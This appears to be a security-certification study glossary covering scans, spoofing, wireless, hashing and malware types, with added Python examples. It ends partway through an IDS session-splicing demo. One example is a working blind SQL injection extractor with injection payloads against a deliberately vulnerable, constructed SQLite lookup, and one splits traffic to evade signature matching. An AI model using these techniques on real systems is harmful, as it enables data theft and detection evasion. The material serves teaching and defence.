Tailgating Social Engineering Attack
An attacker, seeking entry to a restricted area secured by unattended, electronic access control, simply walks in behind a person who has legitimate access. Following common courtesy, the legitimate person will usually hold the door open for the attacker or the attackers themselves may ask the employee to hold it open for them.
IPchains
Linux IP Firewalling Chains, normally called ipchains, is free software to control the packet filter or firewall capabilities in the 2.2 series of Linux kernels. It superseded ipfwadm, but was replaced by iptables in the 2.4 series.
Chosen-Ciphertext Attack
Is an attack model for cryptanalysis in which the cryptanalyst gathers information, at least in part, by choosing a ciphertext and obtaining its decryption under an unknown key. In the attack, an adversary has a chance to enter one or more known ciphertexts into the system and obtain the resulting plaintexts. From these pieces of information the adversary can attempt to recover the hidden secret key used for decryption.
SOX (Sarbanes-Oxley Act)
Is legislation passed by the U.S. Congress to protect shareholders and the general public from accounting errors and fraudulent practices in the enterprise, as well as improve the accuracy of corporate disclosures. The U.S. Securities and Exchange Commission (SEC) administers the act, which sets deadlines for compliance and publishes rules on requirements.
TCP Handshake
The procedure that takes place between two TCP/IP nodes to establish a connection. Known as the "SYN, SYN-ACK, ACK handshake," computer A transmits a SYN packet to computer B, which sends back a SYN-ACK packet to A. Computer A then transmits an ACK packet to B, and the connection is established. The ACK flag is then transmitted in either direction after the TCP handshake.
Half-Open-Scan
This technique is often referred to as TCP SYN, because you don't open a full TCP connection. You send a SYN packet, as if you are going to open a real connection and wait for a response. A SYN|ACK indicates the port is listening. A RST is indicative of a non- listener. If a SYN|ACK is received, you immediately send a RST to tear down the connection.
XMAS Scan
Is a packet with every single option set for whatever protocol is in use. When used as part of scanning a system, the TCP header of a Christmas tree packet (nmap -sX) has the FIN, URG and PSH flags set. On an RFC 793 compliant stack a closed port answers with a RST and an open port stays silent, so silence is reported as open|filtered. Windows, Cisco and some other stacks send a RST regardless of port state, so the scan cannot distinguish open from closed ports on them.
TCP Connect scan
This type of scan connects to the target port and completes the connection (full three-way handshake). It is the most reliable and needs no raw-socket privileges, but the target application logs the connection, so it is the easiest to detect and the least stealthy. It is also slower than a SYN scan, because every connection has to be established and then torn down.
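The following Python is an added example (not part of the original guide) of a TCP connect scan: it completes the full handshake on each port and maps the operating system's result to open, closed or filtered. To run offline it starts its own listener on a loopback port chosen by the OS and picks a second port that nothing is listening on; the host 127.0.0.1 and those ports are the only assumptions.

```python
import errno
import socket
import threading


def connect_scan(host, ports, timeout=0.5):
    """TCP connect scan: a full three-way handshake per port, so the target
    application sees (and may log) every probe."""
    results = {}
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            rc = sock.connect_ex((host, port))
        except socket.timeout:
            rc = errno.ETIMEDOUT
        finally:
            sock.close()                        # send FIN/RST: tear the connection down again
        if rc == 0:
            results[port] = "open"              # SYN, SYN-ACK, ACK all completed
        elif rc == errno.ECONNREFUSED:
            results[port] = "closed"            # the host answered the SYN with a RST
        else:
            results[port] = "filtered"          # nothing came back before the timeout
    return results


def start_listener(host="127.0.0.1"):
    """Listen on an OS-chosen port and accept connections in the background."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return                          # listener was closed
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def free_port(host="127.0.0.1"):
    """Ask the OS for an unused port and release it so nothing listens there."""
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind((host, 0))
    port = tmp.getsockname()[1]
    tmp.close()
    return port


def run_demo():
    srv, open_port = start_listener()
    closed_port = free_port()
    try:
        results = connect_scan("127.0.0.1", [open_port, closed_port])
    finally:
        srv.close()
    return results[open_port], results[closed_port]


if __name__ == "__main__":
    print(run_demo())
```

A SYN scan reaches the same open/closed decision from the SYN-ACK or RST alone and never sends the final ACK, which is why it needs raw sockets, leaves no accepted connection for the application to log, and runs faster.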
TCP ACK Scan
Is commonly used to map out firewall rulesets. In particular, it helps understand whether firewall rules are stateful or not. The downside is that it cannot distinguish open or closed ports. Sometimes no response means that the port could be filtered.
NULL Scan
Does not set any bits (the TCP flags field is 0). Everything is turned off. If the port being scanned is closed, a RST comes back. If the port is open, no response is given, which looks the same as a firewall dropping the probe, so nmap reports it as open|filtered.
Idle Scan
Is a TCP port scan method that consists of sending spoofed packets to a computer to find out what services are available, without the target ever seeing the attacker's address. It works by impersonating another computer called a "zombie" (an idle host that is not otherwise sending or receiving traffic) and observing how the zombie's IP identification (IP ID) counter increments: the attacker sends a SYN to the target with the zombie's address as source; an open port makes the target send a SYN-ACK to the zombie, which answers with a RST and thereby bumps its IP ID by one more than expected.
Stealth Scan
These types of scans never complete the 3 way handshake or open a full TCP connection to the target.
SYN Flood Attack
Is a form of denial-of-service attack in which an attacker sends a succession of SYN requests (Half open connections without replies) to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic.
Distributed Port Scan
Distributed portscans occur when multiple hosts (multiple computers) query one host (or computer) for open services and/or ports. This is used to evade an IDS and obfuscate command and control hosts.
Stateful Firewall Inspection
Ensures that all inbound packets are the result of an outbound request. It was designed to prevent harmful or unrequested packets from entering the network, and it will not respond to an ACK scan on port 80 because there is no matching outbound request in its state table, so the unsolicited ACK is simply dropped.
Robot.txt file
Robots.txt is the common name of a text file placed in a Web site's root directory; crawlers request /robots.txt directly, it is not linked from the HTML. The file is used to give instructions about the Web site to Web robots and spiders. Web authors use robots.txt to keep cooperating Web robots from indexing all or parts of a Web site. Because its Disallow entries list the paths the owner does not want indexed, it is a useful footprinting source that often reveals admin consoles and other hidden directories; it is not an access control.
Archive.org Website
The Archive.org website is a digital archive of the World Wide Web and other information on the Internet created by the Internet Archive, a non-profit organization, based in San Francisco, California. The service enables users to see archived versions of web pages across time. This is commonly used to footprint an organization to gather competitive intelligence or any other type of info that may be useful.
RIR (Regional Internet Registry)
The five RIRs are AfriNIC, ARIN, APNIC, LACNIC and RIPE NCC. Their WHOIS databases are a primary footprinting source for finding who owns an IP address range.
ARIN Registry
The American Registry for Internet Numbers (ARIN) is the Regional Internet Registry (RIR) for Canada, the United States, and many Caribbean and North Atlantic islands.
RID 500
Administrator Account
RID 501
Guest Account
RID 1000+
1st registered User and so on.
TCP-OVER-DNS Tool
Tcp-over-dns is a client server tool used to evade firewall inspections. It can be used with Windows, Linux and Solaris.
Ike-scan tool
Is a command-line tool for discovering, fingerprinting and testing IPsec VPN and Firewall systems. It constructs and sends IKE Phase-1 packets to the specified hosts, and displays any responses that are received.
TCP Flow tool
Is a program that captures data transmitted as part of TCP connections (flows), and stores the data in a way that is convenient for protocol analysis and debugging. Each TCP flow is stored in its own file. Thus, the typical TCP flow will be stored in two files, one for each direction.
Filesnarf tool
Sniffs files from NFS traffic.
Wireshark (formerly known as Ethereal)
Ethereal/Wireshark is a network packet analyzer. A network packet analyzer captures network packets and displays the packet data in as much detail as possible. On a hub it sees everything, because every frame is delivered to all ports; on a switched network it only sees traffic for its own port unless a SPAN port, a network tap or ARP poisoning is used.
Cain & Abel
Is a password recovery tool for Microsoft Windows. It can recover many kinds of passwords using methods such as network packet sniffing and cracking various password hashes (and Cisco VPN configuration files) by means of dictionary attacks, brute force and cryptanalysis attacks.
John the Ripper Tool
Is a free password cracking software tool. It's one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, auto detects password hash types, and includes a customizable cracker.
L0phtCrack
Is a password auditing and recovery application. It uses multiple assessment methods to assist administrators in reducing security risks.
NWPCrack
It's a brute force login attack program that uses a wordlist attack method against NetWare.
ADMmutate
A shellcode mutation engine that can evade a NIDS. From its documentation: 'I have chosen to attack the signature analysis method with a technique very well known to virus enthusiasts, a polymorphic algorithm that is designed to impair the effectiveness of regexp's against known attack signatures.'
Snort tool
Snort is an open source network intrusion detection/prevention system (IDS/IPS) capable of performing real-time traffic analysis (sniffing) and packet logging on IP networks. It can perform protocol analysis and content searching and matching, and can be used to detect a variety of attacks and probes, such as buffer overflows, stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts and more. It runs in three modes: sniffer, packet logger and network intrusion detection system.
Smurf Attack
The Smurf Attack is a distributed denial-of-service attack in which a large number of ICMP echo requests with the intended victim's spoofed source IP address are sent to a network's IP broadcast address, so every host on that network replies to the victim at once. To counter it, disable IP directed broadcasts on routers (no ip directed-broadcast on Cisco) and configure hosts not to answer broadcast pings.
Teardrop Attack
Sends packets that are malformed, with the fragmentation offset value tweaked, so that the receiving packets overlap.
Fragroute
It intercepts, modifies, and rewrites egress traffic destined for a specified host. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behavior.
Rootkits
A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer. The best way you can get rid of them is to load from a known good media. It's also designed to replace legitimate programs.
Packet Filter
Packet filtering is a firewall technique used to control network access by monitoring outgoing and incoming packets and allowing them to pass or halt based on the source and destination Internet Protocol (IP) addresses, protocols and ports. It also inspects the header information of said packets.
Suicide Hacker
Suicide hackers are those who hack for a cause and do not care about suffering long-term imprisonment for their actions. Their motives can be good or bad.
Hacktivism
Is the act of hacking, or breaking into a computer system, for a politically or socially motivated purpose or cause. The individual who performs an act of hacktivism is said to be a hacktivist.
IPsec
Is a protocol suite for securing Internet Protocol (IP) communications by authenticating and encrypting each IP packet of a communication session. It provides confidentiality, integrity and data-origin authentication, but because its integrity checks use shared symmetric keys it does not provide non-repudiation; that requires digital signatures.
LM Hashes/Authentication
Is a weak password hashing function that was the primary hash used by Microsoft LAN Manager and by Windows versions prior to Windows NT to store user passwords. Passwords are limited to 14 characters, converted to upper case, padded and split into two 7-character halves, each of which is used as a DES key to encrypt a fixed string; the two halves can be cracked independently. It should be disabled whenever possible through the NoLMHash registry setting or the "Do not store LAN Manager hash value" policy.
OWASP (Open Web Application Security Project)
Is an online community dedicated to web application security. This community works to create freely-available articles, methodologies, documentation, tools, and technologies that include web application flaws and a way to address and correct them.
White Box Testing
All information about the company is given to the assessment personnel so they can address the security issues of the company's systems.
Gray Box Testing
Some information about the company is given to the assessment personnel so they can address the security issues of the company's systems.
Black Box Testing
No information about the company (other than its name) is given to the assessment personnel; they must discover the company's systems and their security issues themselves.
Null-Bytes
Most shellcodes are written without the use of null bytes because they are intended to be injected into a target process through null-terminated strings. When shellcode that contains nulls is injected in this way, only part of the shellcode would be injected, making it incapable of running successfully because these will also end the string. They should be avoided at all cost when writing shellcodes.
Null user
It's a user that does not have a username or password.
Buffer Overflow
If the amount of data copied into a memory buffer exceeds the size of the buffer, the extra data overwrites whatever is in the adjacent bytes, and those bytes may hold values and addresses the program relies on. Overflows are a common cause of malfunctioning software and are usually the result of missing bounds checks and inadequate testing.
Set type = A
nslookup option that queries A records: the IPv4 address of a host name (AAAA for IPv6)
Set type = MB
nslookup option that queries MB records: the mailbox domain name (an experimental record rarely seen in practice)
Set type = MX
nslookup option that queries MX records: the mail exchangers for a domain, with their priorities
Set type = NS
nslookup option that queries NS records: the authoritative DNS name servers for a zone
Zone Files
Is a text file that describes a DNS zone, a subset (often a single domain) of the hierarchical DNS namespace. It maps names to IP addresses and other resources as text resource records: SOA (zone authority and serial number), NS, A/AAAA, MX, CNAME, PTR, TXT and so on. A server that allows zone transfers (AXFR) to anyone hands an attacker the complete file, which is why zone transfers should be restricted to secondary servers.
Cross Certification
Cross certification enables entities in one public key infrastructure (PKI) to trust entities in another PKI. This mutual trust relationship is typically supported by a cross-certification agreement between the certification authorities (CAs) in each PKI. The agreement establishes the responsibilities and liability of each party.
PKI (Public Key Infrastructure)
Is the set of hardware, software, people, policies and procedures needed to create, manage, distribute, use, store and revoke digital certificates and to manage public-key encryption. The Registration Authority (RA) verifies the applicant's identity, after which the Certification Authority (CA) issues the certificate binding the applicant's public key to that identity. PKI is not tied to one algorithm: certificates commonly carry RSA keys (2048 bits or more today; 1024-bit RSA is deprecated) or elliptic-curve keys.
How to detect IP Spoofing:
Reply to the source address claimed in the packet. It is common for a spoofed address not to belong to a real host, or to belong to one that is not active, in which case no response comes back.

Compare the Time to Live (TTL) of the suspect packet with the TTL of a reply obtained by probing the claimed source. A response by itself does not prove the packet was legitimate, but if the remaining TTLs differ (because a different operating system, with a different initial TTL, or a different path answered) the original packet was likely spoofed.

Compare the IP identification fields of the two packets. This is the least reliable check, but a host that increments the IP ID with every packet will produce values close to those in the suspect packet; a large gap suggests a different sender.
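The three checks above applied to packet summaries, as an added example that is not from the study guide. The addresses, TTLs and IP-ID values are constructed; in practice they come from a capture of the suspect packet and of the reply to a probe sent to the claimed source.

```python
"""Heuristic IP-spoofing assessment (added example, constructed data).

Each check can produce false positives (paths change, load balancers answer
probes, some stacks randomise IP-IDs), so the result is a list of indicators
to investigate, not a verdict.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class PacketSummary:
    src: str      # claimed source address
    ttl: int      # remaining TTL as observed on the wire
    ip_id: int    # 16-bit IP identification field


def ip_id_distance(a: int, b: int) -> int:
    """Distance between two 16-bit IP-ID values, allowing for wrap-around."""
    d = abs(a - b) % 65536
    return min(d, 65536 - d)


def assess_spoofing(suspect: PacketSummary,
                    probe_reply: Optional[PacketSummary],
                    ttl_tolerance: int = 1,
                    id_window: int = 256) -> List[str]:
    """Return the indicators suggesting `suspect` carries a spoofed source.

    probe_reply is the reply received after contacting suspect.src, or None
    if nothing came back within the timeout.
    """
    if probe_reply is None:
        return ["no response from the claimed source address"]
    reasons = []
    if probe_reply.src != suspect.src:
        reasons.append("reply came from a different address than claimed")
    if abs(probe_reply.ttl - suspect.ttl) > ttl_tolerance:
        reasons.append(f"TTL mismatch: suspect {suspect.ttl}, probe reply {probe_reply.ttl}")
    if ip_id_distance(probe_reply.ip_id, suspect.ip_id) > id_window:
        reasons.append(f"IP-ID gap: suspect {suspect.ip_id}, probe reply {probe_reply.ip_id}")
    return reasons


# Constructed sample: a packet claiming 203.0.113.7 with a Linux-like TTL,
# while the real host answers with a Windows-like TTL and unrelated IP-ID.
SUSPECT = PacketSummary("203.0.113.7", ttl=57, ip_id=41220)
REPLY_FROM_REAL_HOST = PacketSummary("203.0.113.7", ttl=118, ip_id=1033)

if __name__ == "__main__":
    for reason in assess_spoofing(SUSPECT, REPLY_FROM_REAL_HOST):
        print("indicator:", reason)
```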
WHOIS Search
Is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system, but is also used for a wider range of other information and can be used to passively gather information about a target or company.
Dumpster Diving
Involves searching through trash or garbage looking for something useful. This is often done to uncover useful information that may help an individual get access to a particular network. So, while the term can literally refer to looking through trash, it is used more often in the context of any method (especially physical methods) by which a hacker might look for information about a computer or network system.
Replay Attack
A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed, either by the originator or by an adversary who intercepts it and retransmits it later. Countermeasures include challenge/response authentication with a single-use random nonce, timestamps and sequence numbers, so that a captured message is rejected when it is presented a second time.
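The challenge/response countermeasure as working code, added here as an example that is not from the study guide. The shared key is constructed for the demo; the server issues a random nonce, the client answers with an HMAC over it, and the server refuses the same nonce twice, so a captured (nonce, response) pair is useless to a replaying attacker.

```python
"""Nonce-based challenge/response that rejects replayed responses.

Added example, not from the study guide.  The shared key is a constructed
demo value; the protocol is the general pattern, not a specific product's.
"""
import hashlib
import hmac
import secrets


class ChallengeResponseServer:
    """Issues single-use nonces and verifies HMAC responses to them."""

    def __init__(self, shared_key: bytes):
        self._key = shared_key
        self._outstanding = set()   # nonces issued but not yet answered

    def challenge(self) -> bytes:
        nonce = secrets.token_bytes(16)
        self._outstanding.add(nonce)
        return nonce

    def verify(self, nonce: bytes, response: bytes) -> bool:
        # An unknown or already-consumed nonce is rejected outright: this is
        # what defeats a captured (nonce, response) pair being replayed.
        if nonce not in self._outstanding:
            return False
        self._outstanding.discard(nonce)   # consume it even if the MAC is wrong
        expected = hmac.new(self._key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)   # constant-time compare


def client_response(shared_key: bytes, nonce: bytes) -> bytes:
    """What a legitimate client sends back for a given challenge."""
    return hmac.new(shared_key, nonce, hashlib.sha256).digest()


def demo():
    """Legitimate login, then a replay, then a forgery with the wrong key."""
    key = b"constructed-shared-secret"
    server = ChallengeResponseServer(key)

    nonce = server.challenge()
    response = client_response(key, nonce)
    first_attempt = server.verify(nonce, response)      # accepted

    replayed = server.verify(nonce, response)           # same pair again: rejected

    new_nonce = server.challenge()
    forged = server.verify(new_nonce, client_response(b"wrong-key", new_nonce))
    return first_attempt, replayed, forged


if __name__ == "__main__":
    print("first, replay, forged =", demo())
```

A production implementation also expires unanswered nonces after a short time and binds the response to the session (for example by including the client identity in the MAC input), so that a challenge issued to one client cannot be answered by another.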
MAC Flooding Attack
Is the act of overloading a switch's content addressable memory (CAM) table with frames carrying bogus source MAC addresses so that legitimate entries are pushed out. Many switches then fail open and flood frames to all ports like a hub, letting the attacker sniff traffic; the attack can also cause a DoS against the switch. It is countered with port security on the switch, limiting the number of MAC addresses a port may learn.
MAC Spoofing
MAC spoofing is a technique for changing the factory-assigned Media Access Control (MAC) address of a network interface on a networked device. The address is burned into the network interface controller (NIC), but the address the driver actually places in frames can be overridden in software, which defeats MAC-based access control lists and filtering.
Purpose of a Security Assessment
The goal of a security assessment is to verify that the necessary security controls are integrated into the design and implementation of a project, and to validate that those controls actually work as intended.
Automated Vulnerability Assessment Tool
Is a tool that automates the process of identifying, quantifying and prioritising (ranking) the vulnerabilities in a system, usually by probing for known service versions and misconfigurations. One of the biggest problems with these tools is that they are noisy and easily detected on the network; another is false positives, so findings should be verified manually.
ISO 27002 Standard
It establishes guidelines and general principles for initiating, implementing, maintaining, and improving information security management within an organization. The actual security controls listed in the standard are intended to address the specific requirements identified via a formal risk assessment.
Netstumbler
Is a tool for Windows that facilitates detection of wireless LANs using the 802.11b, 802.11a and 802.11g WLAN standards. It is an active scanner: it sends probe requests and logs the access points that answer, which makes it easy to detect and means it misses access points configured to ignore broadcast probes. It does not capture or decrypt wireless traffic.
WEP
Wired Equivalent Privacy (WEP) is a security protocol specified in the original IEEE 802.11 wireless LAN standard, designed to give a wireless local area network (WLAN) a level of security and privacy comparable to what is usually expected of a wired LAN. It uses RC4 with a 24-bit initialisation vector and a CRC-32 integrity check, both cryptographically weak; WEP keys can be recovered in minutes from captured traffic and it should not be used.
WPA2
WPA2 is a security technology commonly used on Wi-Fi wireless networks. WPA2 (Wi-Fi Protected Access 2) replaced the original WPA on all certified Wi-Fi hardware from 2006 and implements the IEEE 802.11i standard for data encryption. It uses AES-CCMP with 128-bit keys and a 48-bit packet number (IV), which prevents the IV reuse that broke WEP.
Omnidirectional Antenna
is a class of antenna which radiates radio wave power uniformly in all directions in one plane, with the radiated power decreasing with elevation angle above or below the plane, dropping to zero on the antenna's axis. It's mostly used in wireless communication.
Aircrack
Is a network software suite (Aircrack-ng) consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tools for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitor mode and can sniff 802.11a, 802.11b and 802.11g traffic.
Rogue Access Point
A rogue access point is a wireless access point that has either been installed on a company network without explicit authorization from the network administrator, or has been set up by an attacker to impersonate a legitimate access point (an "evil twin") with a stronger signal, so that clients associate with it and their traffic can be intercepted in a man-in-the-middle attack.
Hash Algorithm - SHA-1
160 bits (40 hex characters); practical collisions have been demonstrated, so it is deprecated for signatures
Hash Algorithm - SHA-512
512 bits (128 hex characters)
Hash Algorithm - MD5
128 bits (32 hex characters); collisions are trivial to generate
Hash Algorithm - CRC-32
32 bits; an error-detecting checksum, not a cryptographic hash, and easily forged
Hash Algorithm - MD6
Variable output length, up to 512 bits
RC4
In cryptography, RC4 (Rivest Cipher 4, also known as ARC4 or ARCFOUR, meaning Alleged RC4) was for many years the most widely used software stream cipher, appearing in SSL/TLS, WEP and WPA-TKIP. Statistical biases in its keystream make it insecure, and RFC 7465 prohibits its use in TLS.
Collision resistance
Is a property of cryptographic hash functions: a hash function H is collision resistant if it is hard to find two distinct inputs x and y with H(x) = H(y). Because of the birthday paradox a generic attack finds a collision in roughly 2^(n/2) evaluations for an n-bit output, which is why 128-bit MD5 and 160-bit SHA-1 are no longer considered adequate.
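The birthday bound made concrete, as an added example that is not from the study guide: SHA-256 is truncated to a small number of bits (a constructed toy, SHA-256 itself is not weakened) and a generic search finds two distinct messages with the same truncated digest in about 2^(n/2) tries, far below the 2^n a brute-force preimage search would need.

```python
"""Birthday search for collisions on a truncated hash (added example).

The truncation is a constructed toy to make the search finish instantly; it
says nothing about full SHA-256.  For n output bits a collision is expected
after about 2**(n/2) hashes, and the pigeonhole principle guarantees one
within 2**n + 1 distinct messages.
"""
import hashlib


def truncated_sha256(data: bytes, bits: int) -> int:
    """Top `bits` bits of SHA-256(data) as an integer (1 <= bits <= 256)."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def generic_collision_work(bits: int) -> int:
    """Approximate number of hash evaluations a birthday attack needs."""
    return 2 ** (bits // 2)


def find_collision(bits: int):
    """Return (msg_a, msg_b, tries): two distinct messages with equal n-bit digest."""
    seen = {}                                  # digest -> first message producing it
    for i in range(2 ** bits + 1):             # pigeonhole: a repeat must occur by here
        msg = f"message-{i}".encode()          # constructed, distinct inputs
        h = truncated_sha256(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg
    raise AssertionError("unreachable: pigeonhole principle guarantees a collision")


if __name__ == "__main__":
    bits = 16
    a, b, tries = find_collision(bits)
    print(f"{bits}-bit collision after {tries} hashes "
          f"(expected about {generic_collision_work(bits)}): {a!r} and {b!r}")
```

The dictionary is the memory cost of the attack; Floyd/Brent cycle finding or van Oorschot-Wiener distinguished points remove it, which is what makes the attack practical at 64-bit scale.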
HEAD / HTTP/1.0
When this request is typed into a raw connection to the web server's port (for example with netcat or telnet) and Enter is pressed twice, the blank line ends the request headers and the server returns only its response headers. The Server header is the web server's banner, and it often reveals the underlying operating system as well; this is banner grabbing.
Blind SQL Injection
Is a form of SQL injection used when the application shows no database error messages or query output. The attacker constructs inputs containing Boolean SQL conditions (or time delays) and infers one bit at a time from the application's behaviour: whether the page content changed, or how long the response took. Data is extracted character by character, so it is slow but fully automatable.
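A boolean-based blind extraction against a deliberately vulnerable lookup, as an added example that is not from the study guide. The database, table and password are constructed; the vulnerable function only reports whether a row exists and never shows SQL errors, and the hardened version with a bound parameter is shown beside it.

```python
"""Boolean-based blind SQL injection against a constructed SQLite database.

Added example, not from the study guide.  vulnerable_user_exists() is kept
vulnerable on purpose to show the technique; safe_user_exists() is the fix.
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample database: one user row to be extracted blind."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    con.commit()
    return con


def vulnerable_user_exists(con: sqlite3.Connection, username: str) -> bool:
    # Deliberately vulnerable: user input is concatenated into the SQL text.
    # The caller only learns True/False, never the query result or an error.
    sql = "SELECT 1 FROM users WHERE name = '" + username + "'"
    return con.execute(sql).fetchone() is not None


def safe_user_exists(con: sqlite3.Connection, username: str) -> bool:
    # Hardened form: a bound parameter is data and is never parsed as SQL.
    row = con.execute("SELECT 1 FROM users WHERE name = ?", (username,)).fetchone()
    return row is not None


def oracle(con: sqlite3.Connection, condition: str) -> bool:
    """Ask one yes/no question about the admin row through the injection point.

    The trailing '-- ' comments out the application's closing quote.
    """
    return vulnerable_user_exists(con, f"admin' AND ({condition}) -- ")


def extract_password(con: sqlite3.Connection, column: str = "password",
                     max_len: int = 64) -> str:
    """Recover a column value one character at a time from True/False answers."""
    length = next(n for n in range(1, max_len + 1)
                  if oracle(con, f"length({column}) = {n}"))
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126      # printable ASCII: binary search, ~7 queries per char
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr({column}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


if __name__ == "__main__":
    con = build_db()
    print("recovered:", extract_password(con))
    print("tautology against vulnerable lookup:", vulnerable_user_exists(con, "x' OR '1'='1"))
    print("tautology against safe lookup:", safe_user_exists(con, "x' OR '1'='1"))
```

Against a real application the oracle is an HTTP request whose response is classified as "true" or "false" by content length, a marker string, or response time for time-based variants; the search logic is unchanged.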
ARP Poisoning
Is an attack in which the attacker sends forged ARP replies (and requests) on an Ethernet LAN so that the target's ARP cache maps another host's IP address, typically the default gateway's, to the attacker's MAC address. Because the cache entry is forged, the target sends its frames to the attacker first, who forwards them to the real destination to stay unnoticed; poisoning both the victim and the gateway (two steps) gives a full man-in-the-middle position for sniffing or tampering. It is mitigated with static ARP entries or Dynamic ARP Inspection on the switch.
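Detection logic for the attack described above, added as an example that is not from the study guide. It runs over a constructed list of ARP replies as a sniffer on the segment would see them and flags the two symptoms of poisoning: one IP advertised by more than one MAC, and one MAC claiming more than one IP.

```python
"""ARP poisoning detection over sniffed ARP replies (added example).

SAMPLE_ARP_REPLIES is constructed: the first two entries are the legitimate
gateway and victim, the last two are the attacker's forged replies.
"""
from collections import defaultdict
from typing import Iterable, List, Tuple

SAMPLE_ARP_REPLIES: List[Tuple[str, str]] = [
    ("192.168.1.1",  "00:11:22:33:44:01"),   # real gateway
    ("192.168.1.10", "00:11:22:33:44:0a"),   # victim
    ("192.168.1.1",  "de:ad:be:ef:00:01"),   # attacker claims the gateway IP
    ("192.168.1.10", "de:ad:be:ef:00:01"),   # attacker claims the victim IP
]


def detect_arp_poisoning(replies: Iterable[Tuple[str, str]]) -> List[str]:
    """Return alert strings for IP->MAC conflicts seen in (sender IP, sender MAC) pairs."""
    ip_to_macs = defaultdict(set)
    mac_to_ips = defaultdict(set)
    for ip, mac in replies:
        mac = mac.lower()
        ip_to_macs[ip].add(mac)
        mac_to_ips[mac].add(ip)

    alerts = []
    # Symptom 1: the same IP answered from two different hardware addresses.
    for ip, macs in sorted(ip_to_macs.items()):
        if len(macs) > 1:
            alerts.append(f"{ip} advertised by multiple MACs: {sorted(macs)}")
    # Symptom 2: one NIC claims to be several hosts (gateway and victim at once).
    # Routers and multi-homed hosts can legitimately trip this, so tune with a whitelist.
    for mac, ips in sorted(mac_to_ips.items()):
        if len(ips) > 1:
            alerts.append(f"{mac} claims multiple IPs: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_ARP_REPLIES):
        print("ALERT:", alert)
```

A resident monitor would keep the IP-to-MAC table across time and alert on any change to an entry for the gateway, which catches a poisoning that starts after the legitimate reply was recorded.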
Macro Virus
A type of computer virus that is encoded as a macro embedded in a document. Many applications, such as Microsoft Word and Excel, support powerful macro languages. These applications allow you to embed a macro in a document, and have the macro execute each time the document is opened.
Trojan Virus
Is generally a non-self-replicating type of malware that masquerades as legitimate software and, when executed, carries out whatever actions its author intended, typically theft or loss of data, remote control of the host, or system damage. It relies on the user running it rather than on exploiting a vulnerability.
Wrappers
Is a program used to combine two or more executables into a single packaged program.
Polymorphic Virus
A virus that changes its virus signature (i.e., its binary pattern) every time it replicates and infects a new file in order to keep from being detected by an antivirus program.
Stealth Virus
A computer virus that actively hides itself from antivirus software by either masking the size of the file that it hides in or temporarily removing itself from the infected file and placing a copy of itself in another location on the drive, replacing the infected file with an uninfected one that it has stored on the hard drive.
Cavity Virus
A cavity (or spacefiller) virus installs itself inside the unused regions (padding or slack space) of the file it infects, so the file's size does not change and the infection is harder to notice.
Back Orifice
Is a controversial computer program designed for remote system administration that lets a user control a computer running Microsoft Windows from a remote location; in practice it was used as a backdoor Trojan. The name is a play on Microsoft's BackOffice Server software. The server component listens by default on UDP port 31337.
PGP Encryption
Is a data encryption and decryption computer program that provides cryptographic privacy and authentication for data communication. It uses a serial combination of hashing, data compression, symmetric-key cryptography, and finally public-key cryptography; each step uses one of several supported algorithms. Each public key is bound to a user name and/or an e-mail address.
Session Splicing
Works by delivering the payload over multiple packets, which defeats simple pattern matching without session reconstruction. This payload can be delivered in many different ways and even spread out over long periods of time.
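The evasion above and the reassembly that defeats it, as an added example that is not from the study guide. The request, the signature and the segment size are constructed; a per-packet matcher never sees the whole pattern, while a matcher that reassembles the stream from segment offsets does, even when segments arrive out of order.

```python
"""Session splicing versus stream reassembly (added example, constructed data)."""
from typing import Iterable, List, Tuple

SIGNATURE = b"/cgi-bin/phf"          # constructed pattern a toy IDS looks for
REQUEST = b"GET /cgi-bin/phf?Qalias=x HTTP/1.0\r\n\r\n"   # constructed request

Segment = Tuple[int, bytes]          # (stream offset, payload bytes)


def splice(payload: bytes, chunk: int) -> List[Segment]:
    """Split the payload into small TCP segments, each tagged with its offset."""
    return [(i, payload[i:i + chunk]) for i in range(0, len(payload), chunk)]


def per_packet_match(segments: Iterable[Segment], signature: bytes = SIGNATURE) -> bool:
    """Naive IDS: pattern-match each packet on its own (what splicing evades)."""
    return any(signature in data for _, data in segments)


def reassemble(segments: Iterable[Segment]) -> bytes:
    """Rebuild the stream from offsets, tolerating out-of-order delivery."""
    return b"".join(data for _, data in sorted(segments, key=lambda s: s[0]))


def stream_match(segments: Iterable[Segment], signature: bytes = SIGNATURE) -> bool:
    """IDS with session reconstruction: match against the reassembled stream."""
    return signature in reassemble(segments)


if __name__ == "__main__":
    # Deliver 4-byte segments in reverse order, as an evasive sender might.
    out_of_order = list(reversed(splice(REQUEST, 4)))
    print("per-packet match:", per_packet_match(out_of_order))
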